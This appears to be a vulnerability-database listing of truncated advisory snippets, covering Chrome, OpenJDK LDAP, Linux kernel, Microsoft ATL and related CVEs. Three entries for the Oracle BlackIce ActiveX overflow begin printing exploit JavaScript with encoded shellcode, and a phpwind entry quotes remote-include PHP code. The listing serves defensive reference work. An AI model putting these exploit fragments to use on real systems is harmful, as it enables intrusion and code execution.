CVE-2010-0663

CVE-2010-0663 refers to Google Chrome prior to 4.0.249.78, where the ParamTraits::Read function in common/common_param_traits.cc does not initialize memory for bitmap data. This could allow remote attackers to obtain potentially sensitive information from process memory, related to use of a thumb...

OpenJDK remote LDAP Denial-Of-Service (6717680)

LdapCtx in the LDAP service in Java SE Development Kit JDK and Java Runtime Environment JRE 5.0 Update 17 and earlier; 6 Update 12 and earlier; SDK and JRE 1.3.124 and earlier; and 1.4.219 and earlier does not close the connection when initialization fails, which allows remote attackers to cause ...

phpwind 7.5 apps/groups/index.php远程包含漏洞

apps/groups/index.php 里$route和$basePath变量没有初始化,导致远程包含或者本地包含php文件,导致执行任意php代码 ?php if $route == "groups" requireonce $basePath . '/action/mgroups.php'; elseif $route == "group" requireonce $basePath . '/action/mgroup.php'; elseif $route == "galbum" requireonce $basePath . '/action/mgalbum.php';...

CentOS 5 : kernel (CESA-2007:0347)

Updated kernel packages that fix security issues and bugs in the Red Hat Enterprise Linux 5 kernel are now available. This update has been rated as having important security impact by the Red Hat Security Response Team. The Linux kernel handles the basic functions of the operating system. These n...

OpenJDK remote LDAP Denial-Of-Service (6717680)

LdapCtx in the LDAP service in Java SE Development Kit JDK and Java Runtime Environment JRE 5.0 Update 17 and earlier; 6 Update 12 and earlier; SDK and JRE 1.3.124 and earlier; and 1.4.219 and earlier does not close the connection when initialization fails, which allows remote attackers to cause ...

RedHat Security Advisory RHSA-2009:1522

The remote host is missing updates announced in advisory RHSA-2009:1522. The kernel packages contain the Linux kernel, the core of any Linux operating system. This update fixes the following security issues: multiple, missing initialization flaws were found in the Linux kernel. Padding data in...

Mandrake Security Advisory MDVSA-2009:281 (cups)

The remote host is missing an update to cups announced via advisory MDVSA-2009:281. SPDX-FileCopyrightText: 2009 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only OR...

kernel security update

CentOS Errata and Security Advisory CESA-2009:1522 Updated kernel packages that fix multiple security issues and several bugs are now available for Red Hat Enterprise Linux 4. This update has been rated as having moderate security impact by the Red Hat Security Response Team. Updated 21st July 20...

kernel: netlink: fix numerous padding memleaks

The netlink subsystem in the Linux kernel 2.4.x before 2.4.37.6 and 2.6.x before 2.6.13-rc1 does not initialize certain padding fields in structures, which might allow local users to obtain sensitive information from kernel memory via unspecified vectors, related to the 1 tcfillqdisc, 2...

CA eTrust PestPatrol ActiveX Control Buffer Overflow

This module exploits a stack buffer overflow in CA eTrust PestPatrol. When sending an overly long string to the Initialize property of ppctl.dll 5.6.7.9 an attacker may be able to execute arbitrary code. This module requires Metasploit: https://metasploit.com/download Current source:...

PT-2009-4929 · Microsoft · Windows Media Runtime

Name of the Vulnerable Software and Affected Versions: Microsoft Windows Media Runtime affected versions not specified Description: The issue is related to the improper initialization of unspecified functions within compressed audio files. This allows remote attackers to execute arbitrary code vi...

Microsoft Active Template Library (ATL) multiple security vulnerabilities

Memory corruptions, information leak, initialization problem, leading to killbit protection bypass...

Oracle - Document Capture BlackIce DEVMODE

var devmode = new ActiveXObject"BLACKICEDEVMODE.BlackIceDEVMODECtrl.1"; //user add, user: sun pass: tzu scode = unescape "%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +...

Oracle - Document Capture BlackIce DEVMODE

Oracle - Document Capture BlackIce DEVMODE var devmode = new ActiveXObject"BLACKICEDEVMODE.BlackIceDEVMODECtrl.1"; //user add, user: sun pass: tzu scode = unescape "%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +...

Oracle Document Capture BlackIce Stack Buffer Overflow

var devmode = new ActiveXObject"BLACKICEDEVMODE.BlackIceDEVMODECtrl.1"; //user add, user: sun pass: tzu scode = unescape "%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +...

SuSE9 Security Update : PHP4 (YOU Patch Number 11666)

This update fixes multiple bugs in PHP : - Predictable generaton of an initialization vector IV in the mcrypt extension - Additional cookie attributes could be injected via a session ID. - Specially crafted files could cause integer overflows in gd and leverage them to at least crash gd based...

mysql security and bug fix update

5.0.77-3 - Add fix for CVE-2009-2446 format string vulnerability in COMCREATEDB and COMDROPDB processing Resolves: 512200 5.0.77-2 - Back-port upstream fix for CVE-2008-4456 mysql command line client XSS flaw Resolves: 502169 5.0.77-1 - Update to MySQL 5.0.77, for numerous fixes described at...

Ubuntu 6.06 LTS / 8.04 LTS / 8.10 / 9.04 : linux, linux-source-2.6.15 vulnerability (USN-819-1)

Tavis Ormandy and Julien Tinnes discovered that Linux did not correctly initialize certain socket operation function pointers. A local attacker could exploit this to gain root privileges. By default, Ubuntu 8.04 and later with a non-zero /proc/sys/vm/mmapminaddr setting were not vulnerable. Note...

Vulnerabilities in Microsoft ATL Could Allow Remote Code Execution (973908)

This host is missing a critical security update according to Microsoft Bulletin MS09-037. OpenVAS Vulnerability Test $Id: secpodms09-037.nasl 5363 2017-02-20 13:07:22Z cfi $ Vulnerabilities in Microsoft ATL Could Allow Remote Code Execution 973908 Authors: Antu Sanadi Updated By: Madhuri D on...

OpenJDK remote LDAP Denial-Of-Service (6717680)

LdapCtx in the LDAP service in Java SE Development Kit JDK and Java Runtime Environment JRE 5.0 Update 17 and earlier; 6 Update 12 and earlier; SDK and JRE 1.3.124 and earlier; and 1.4.219 and earlier does not close the connection when initialization fails, which allows remote attackers to cause ...